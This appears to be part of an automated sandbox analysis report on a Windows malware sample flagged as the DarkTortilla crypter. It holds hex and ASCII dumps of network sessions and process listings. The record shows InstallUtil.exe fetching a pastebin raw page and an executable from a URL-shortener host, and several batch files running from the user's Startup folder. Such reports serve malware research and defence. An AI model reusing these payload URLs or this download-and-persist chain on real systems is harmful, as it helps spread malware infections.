                            Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                            2024-09-10 16:22:16 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                            Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                            2024-09-10 16:22:16 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                            Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                            2024-09-10 16:22:16 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                            Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                            2024-09-10 16:22:16 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:22:16 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.1149741104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:21 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:22:21 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c1a04d5132e2-EWR
                            2024-09-10 16:22:21 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:22:21 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:22:21 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:22:21 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:22:21 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.1149742188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:22 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:22:22 UTC910INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:22:22 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:22:22 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FqhMMmQloLq6oy0HC8%2BOAX0c8nlqmx%2Bxyj89jtbiCzdocrmAH%2BFmsyp12j4RYLQ3xRfPk00TdD%2BAko22Q22yzj7%2FtauKEoibxBKY%2FLNgfxNtAF%2B0m4I3ac%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c1a4182d19ef-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:22:22 UTC459INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:22:22 UTC1369INData Raw: 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65
                            Data Ascii: revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><me
                            2024-09-10 16:22:22 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74
                            Data Ascii: ackground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animat
                            2024-09-10 16:22:22 UTC1369INData Raw: 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64
                            Data Ascii: igator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.ind
                            2024-09-10 16:22:22 UTC1369INData Raw: 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75
                            Data Ascii: script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:au
                            2024-09-10 16:22:22 UTC1369INData Raw: 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09
                            Data Ascii: eight:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
                            2024-09-10 16:22:22 UTC166INData Raw: 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: m()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:20:19
                            Start date:10/09/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xe0000
                            File size:951'808 bytes
                            MD5 hash:6D42583DE8CB7222D51B9E5976AB2ED2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1761380905.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1773580345.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:12:20:25
                            Start date:10/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            Imagebase:0xb30000
                            File size:42'064 bytes
                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            General

                            Target ID:7
                            Start time:12:21:11
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:12:21:11
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:12:21:24
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:12:21:24
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:12:21:32
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VKr8Efnr4PhdaHsuTmp4wB4v.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:12:21:32
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:12:21:45
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JG3bSh7wTLa4W4VZ8WnUKE9x.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:14
                            Start time:12:21:45
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
